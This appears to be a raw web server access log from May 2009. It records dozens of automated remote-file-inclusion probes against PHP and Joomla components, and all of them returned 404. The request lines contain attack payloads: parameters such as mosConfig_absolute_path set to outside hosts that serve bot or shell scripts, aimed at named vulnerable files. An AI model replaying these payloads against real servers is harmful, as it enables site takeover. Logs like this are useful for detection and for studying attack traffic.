78.31.64.178 - - [31/May/2009:06:10:09 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
116.36.213.166 - - [31/May/2009:06:11:17 -0400] "GET /logs/access_log.Q109051600%20%20//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
78.31.64.178 - - [31/May/2009:06:11:17 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
78.31.64.178 - - [31/May/2009:06:11:17 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
218.246.20.221 - - [31/May/2009:06:11:23 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
74.208.111.178 - - [31/May/2009:06:12:05 -0400] "GET /index.php?sub=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
74.208.111.178 - - [31/May/2009:06:12:05 -0400] "GET /logs/index.php?sub=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
211.203.180.144 - - [31/May/2009:06:12:14 -0400] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.203.180.144 - - [31/May/2009:06:12:14 -0400] "GET /logs/access_log.Q109051800/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
211.203.180.144 - - [31/May/2009:06:12:14 -0400] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:06:12:29 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
62.149.0.248 - - [31/May/2009:06:12:45 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
62.149.0.248 - - [31/May/2009:06:12:46 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
64.182.124.1 - - [31/May/2009:06:13:07 -0400] "GET /logs/access_log.Q109051800//?path%5Bdocroot%5D=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 226 "-" "Mozilla/5.0"
64.182.124.1 - - [31/May/2009:06:13:17 -0400] "GET /logs/access_log.Q109051700//?path%5Bdocroot%5D=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 226 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:06:13:23 -0400] "GET /logs/access_log.Q109010700%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
69.50.197.106 - - [31/May/2009:06:13:43 -0400] "GET /index.php?sub=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
69.50.197.106 - - [31/May/2009:06:13:43 -0400] "GET /logs/index.php?sub=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:06:14:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.67.16 - - [31/May/2009:06:15:14 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Googlebot-Image/1.0"
66.249.67.16 - - [31/May/2009:06:15:14 -0400] "GET /images/index3_trephine.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
116.36.213.166 - - [31/May/2009:06:15:42 -0400] "GET /logs/access_log.Q109010700%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
222.122.72.93 - - [31/May/2009:06:16:24 -0400] "GET /logs/access_log.Q109051500//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.50.197.106 - - [31/May/2009:06:16:37 -0400] "GET /index.php?sub=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
69.50.197.106 - - [31/May/2009:06:16:37 -0400] "GET /logs/index.php?sub=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
83.231.138.99 - - [31/May/2009:06:17:26 -0400] "GET /logs/access_log.Q109051600//components/com_extcalendar/admin_events.php?CONFIG_EXT[****************S_DIR]=http://www.superlaundry.com//images/.bash/id.txt? HTTP/1.1" 404 269 "-" "libwww-perl/5.65"
112.175.141.41 - - [31/May/2009:06:17:50 -0400] "GET /logs/access_log.Q109051500%20%20//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
121.0.141.241 - - [31/May/2009:06:18:10 -0400] "GET ///vwar/backup/errors.php?error=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
121.0.141.241 - - [31/May/2009:06:18:10 -0400] "GET /logs/access_log.Q109052100%20%20///vwar/backup/errors.php?error=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
121.0.141.241 - - [31/May/2009:06:18:10 -0400] "GET /logs///vwar/backup/errors.php?error=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
71.132.137.190 - - [31/May/2009:06:18:13 -0400] "GET /logs/error_log.Q108112100 HTTP/1.1" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
71.132.136.156 - - [31/May/2009:06:18:19 -0400] "GET /logs/error_log.Q108112200 HTTP/1.1" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
218.146.255.11 - - [31/May/2009:06:19:01 -0400] "GET /logs/access_log.Q109051600%20%20//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:06:19:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.6.8.108 - - [31/May/2009:06:19:12 -0400] "GET /logs/access_log.Q108110900 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
62.149.0.248 - - [31/May/2009:06:20:07 -0400] "GET /logs/access_log.Q109051700//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
62.149.0.248 - - [31/May/2009:06:20:08 -0400] "GET /logs/access_log.Q109051700//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
62.149.0.248 - - [31/May/2009:06:20:08 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
62.149.0.248 - - [31/May/2009:06:20:09 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
62.149.0.248 - - [31/May/2009:06:20:09 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
62.149.0.248 - - [31/May/2009:06:20:10 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
121.0.141.241 - - [31/May/2009:06:20:15 -0400] "GET /logs/access_log.Q109051800%20%20///vwar/backup/errors.php?error=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:06:22:03 -0400] "GET /logs/access_log.Q109051500%20%20//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:06:22:07 -0400] "GET /logs/access_log.Q109051500%20%20//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.146.255.11 - - [31/May/2009:06:23:16 -0400] "GET /logs/error_log.Q109051600%20%20//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
78.31.64.178 - - [31/May/2009:06:23:24 -0400] "GET /logs/error_log.Q108051600//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
78.31.64.178 - - [31/May/2009:06:23:25 -0400] "GET /logs/error_log.Q108051600//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
80.59.178.71 - - [31/May/2009:06:23:27 -0400] "GET /inurl:/modules/My_eGallery/public/displayCategory.php?basepath=http://ciudad.latinol.com/botitos/id.txt???? HTTP/1.1" 404 251 "-" "libwww-perl/5.808"
80.59.178.71 - - [31/May/2009:06:23:27 -0400] "GET /logs/inurl:/modules/My_eGallery/public/displayCategory.php?basepath=http://ciudad.latinol.com/botitos/id.txt???? HTTP/1.1" 404 256 "-" "libwww-perl/5.808"
80.59.178.71 - - [31/May/2009:06:23:27 -0400] "GET /logs/access_log.Q109052200/inurl:/modules/My_eGallery/public/displayCategory.php?basepath=http://ciudad.latinol.com/botitos/id.txt???? HTTP/1.1" 404 278 "-" "libwww-perl/5.808"
116.36.213.166 - - [31/May/2009:06:23:49 -0400] "GET /logs/access_log.Q109051500%20%20//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:06:24:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
80.59.178.71 - - [31/May/2009:06:24:25 -0400] "GET /logs/access_log.Q109052200%20/inurl:/modules/My_eGallery/public/displayCategory.php?basepath=http://ciudad.latinol.com/botitos/id.txt???? HTTP/1.1" 404 279 "-" "libwww-perl/5.808"
213.246.62.35 - - [31/May/2009:06:28:21 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
213.246.62.35 - - [31/May/2009:06:28:21 -0400] "GET /logs/access_log.Q108072400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
213.246.62.35 - - [31/May/2009:06:28:21 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
213.246.62.35 - - [31/May/2009:06:28:27 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
213.246.62.35 - - [31/May/2009:06:28:27 -0400] "GET /logs/access_log.Q108072400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
213.246.62.35 - - [31/May/2009:06:28:27 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
213.246.62.35 - - [31/May/2009:06:28:59 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
213.246.62.35 - - [31/May/2009:06:28:59 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
213.246.62.35 - - [31/May/2009:06:29:02 -0400] "GET /logs/access_log.Q108072400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:06:29:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.246.62.35 - - [31/May/2009:06:29:21 -0400] "GET /logs/access_log.Q109051500/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:06:31:23 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:06:31:23 -0400] "GET /logs/error_log.Q108032900%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:06:31:39 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:06:31:39 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
64.182.124.1 - - [31/May/2009:06:32:36 -0400] "GET //appserv/main.php?appserv_root=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 215 "-" "Mozilla/5.0"
64.182.124.1 - - [31/May/2009:06:32:36 -0400] "GET /logs/access_log.Q109050700//appserv/main.php?appserv_root=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 242 "-" "Mozilla/5.0"
64.182.124.1 - - [31/May/2009:06:32:36 -0400] "GET /logs//appserv/main.php?appserv_root=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 220 "-" "Mozilla/5.0"
112.175.141.41 - - [31/May/2009:06:32:37 -0400] "GET /logs//akocomments.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
112.175.141.41 - - [31/May/2009:06:32:41 -0400] "GET /logs/error_log.Q108061500//akocomments.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
112.175.141.41 - - [31/May/2009:06:32:42 -0400] "GET //akocomments.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
89.108.85.158 - - [31/May/2009:06:33:21 -0400] "GET /logs/error_log.Q108122000//index.php?seite=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
89.108.85.158 - - [31/May/2009:06:33:22 -0400] "GET //index.php?seite=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
89.108.85.158 - - [31/May/2009:06:33:22 -0400] "GET /logs//index.php?seite=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
64.182.124.1 - - [31/May/2009:06:33:25 -0400] "GET //appserv/main.php?appserv_root=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 215 "-" "Mozilla/5.0"
64.182.124.1 - - [31/May/2009:06:33:25 -0400] "GET /logs/access_log.Q109050700%20%20//appserv/main.php?appserv_root=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 244 "-" "Mozilla/5.0"
64.182.124.1 - - [31/May/2009:06:33:25 -0400] "GET /logs//appserv/main.php?appserv_root=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 220 "-" "Mozilla/5.0"
213.246.62.35 - - [31/May/2009:06:33:29 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/superscan/id.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
64.182.124.1 - - [31/May/2009:06:33:34 -0400] "GET //appserv/main.php?appserv_root=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 215 "-" "Mozilla/5.0"
64.182.124.1 - - [31/May/2009:06:33:38 -0400] "GET /logs//appserv/main.php?appserv_root=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 220 "-" "Mozilla/5.0"
64.182.124.1 - - [31/May/2009:06:33:38 -0400] "GET /logs/access_log.Q109050700//appserv/main.php?appserv_root=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 242 "-" "Mozilla/5.0"
121.0.141.241 - - [31/May/2009:06:33:38 -0400] "GET /logs/access_log.Q109052100///vwar/backup/errors.php?error=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
121.0.141.241 - - [31/May/2009:06:34:01 -0400] "GET /logs/access_log.Q109051800///vwar/backup/errors.php?error=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
64.182.124.1 - - [31/May/2009:06:34:09 -0400] "GET /logs/access_log.Q109051700//appserv/main.php?appserv_root=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 242 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:06:34:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.182.124.1 - - [31/May/2009:06:34:19 -0400] "GET /logs/access_log.Q109051700%20%20//appserv/main.php?appserv_root=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 244 "-" "Mozilla/5.0"
89.108.85.158 - - [31/May/2009:06:35:11 -0400] "GET /logs/error_log.Q109030200//index.php?seite=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
64.182.124.1 - - [31/May/2009:06:35:18 -0400] "GET /logs//appserv/main.php?appserv_root=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 220 "-" "Mozilla/5.0"
64.182.124.1 - - [31/May/2009:06:35:18 -0400] "GET //appserv/main.php?appserv_root=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 215 "-" "Mozilla/5.0"
64.182.124.1 - - [31/May/2009:06:35:18 -0400] "GET /logs/access_log.Q109050700//appserv/main.php?appserv_root=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 242 "-" "Mozilla/5.0"
213.246.62.35 - - [31/May/2009:06:35:25 -0400] "GET /logs/error_log.Q108032100/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/superscan/id.txt? HTTP/1.1" 404 260 "-" "libwww-perl/5.803"
213.246.62.35 - - [31/May/2009:06:35:28 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/superscan/id.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
213.246.62.35 - - [31/May/2009:06:35:28 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/superscan/id.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.803"
213.246.62.35 - - [31/May/2009:06:35:56 -0400] "GET /logs/error_log.Q108042000/convert/mvcw.php?vwar_root=http://chicken.3dn.ru/superscan/id.txt? HTTP/1.1" 404 240 "-" "libwww-perl/5.803"
213.246.62.35 - - [31/May/2009:06:35:56 -0400] "GET /convert/mvcw.php?vwar_root=http://chicken.3dn.ru/superscan/id.txt? HTTP/1.1" 404 214 "-" "libwww-perl/5.803"
213.246.62.35 - - [31/May/2009:06:35:57 -0400] "GET /logs/convert/mvcw.php?vwar_root=http://chicken.3dn.ru/superscan/id.txt? HTTP/1.1" 404 219 "-" "libwww-perl/5.803"
89.108.85.158 - - [31/May/2009:06:36:16 -0400] "GET //index.php?seite=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
213.246.62.35 - - [31/May/2009:06:36:32 -0400] "GET /convert/mvcw.php?vwar_root=http://chicken.3dn.ru/superscan/id.txt? HTTP/1.1" 404 214 "-" "libwww-perl/5.803"
74.208.111.178 - - [31/May/2009:06:36:44 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
74.208.111.178 - - [31/May/2009:06:36:44 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
74.208.111.178 - - [31/May/2009:06:36:49 -0400] "GET /logs/access_log.Q109021500/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
213.246.62.35 - - [31/May/2009:06:37:23 -0400] "GET /logs/error_log.Q108050200/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/superscan/id.txt? HTTP/1.1" 404 260 "-" "libwww-perl/5.803"
69.50.197.106 - - [31/May/2009:06:37:54 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
69.50.197.106 - - [31/May/2009:06:37:54 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
69.50.197.106 - - [31/May/2009:06:37:56 -0400] "GET /logs/access_log.Q109021500/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
69.50.197.106 - - [31/May/2009:06:37:58 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
69.50.197.106 - - [31/May/2009:06:37:58 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
69.50.197.106 - - [31/May/2009:06:37:59 -0400] "GET /logs/access_log.Q109021500/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
74.208.111.178 - - [31/May/2009:06:38:22 -0400] "GET /logs/access_log.Q109021500%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
121.0.141.241 - - [31/May/2009:06:38:25 -0400] "GET /phphtml.php?htmlclass_path=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
121.0.141.241 - - [31/May/2009:06:38:25 -0400] "GET /logs/phphtml.php?htmlclass_path=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
121.0.141.241 - - [31/May/2009:06:38:25 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
69.50.197.106 - - [31/May/2009:06:38:56 -0400] "GET /logs/access_log.Q109021500%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
69.50.197.106 - - [31/May/2009:06:39:09 -0400] "GET /logs/access_log.Q109021500%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:06:39:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.182.124.1 - - [31/May/2009:06:39:14 -0400] "GET /logs/access_log.Q109050700%20%20//appserv/main.php?appserv_root=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 244 "-" "Mozilla/5.0"
218.146.255.11 - - [31/May/2009:06:39:49 -0400] "GET /logs/access_log.Q109051500//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.182.124.1 - - [31/May/2009:06:39:54 -0400] "GET /logs/access_log.Q109051700%20%20//appserv/main.php?appserv_root=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 244 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:06:39:56 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:06:39:57 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:06:40:19 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.0.141.241 - - [31/May/2009:06:40:38 -0400] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:06:40:38 -0400] "GET /logs/access_log.Q109051100//include/bbs.lib.inc.php?site_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
112.175.141.41 - - [31/May/2009:06:41:40 -0400] "GET /logs/error_log.Q108061500%20%20//akocomments.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
112.175.141.41 - - [31/May/2009:06:42:11 -0400] "GET /logs/access_log.Q108121900%20%20//akocomments.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
200.142.148.142 - - [31/May/2009:06:42:40 -0400] "GET /logs/show_news.php?cutepath=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
200.142.148.142 - - [31/May/2009:06:42:40 -0400] "GET /logs/access_log.Q109051100/show_news.php?cutepath=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:06:43:06 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:06:43:07 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
